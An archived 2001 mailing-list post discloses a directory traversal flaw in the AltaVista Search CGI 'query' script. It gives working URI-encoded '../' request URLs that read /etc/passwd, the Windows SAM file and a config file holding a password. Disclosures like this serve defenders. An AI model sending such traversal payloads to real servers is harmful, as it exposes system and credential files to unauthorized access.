hola, more bugs in the AV-Search thing .. using uri-encoded strings it is possible to view "any" file on the system .. examples: unixxxsss ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd or on an micro$oft IIS ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._ interesting infos about the file structure ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log or another file which does contain the password .. http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf altavista told me that this is(was) just a flavour of the "old" bug and its fix is(was) included in the last secpatch. whatever .... nicedays :-/ RC rudicarellat_private ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:27 PDT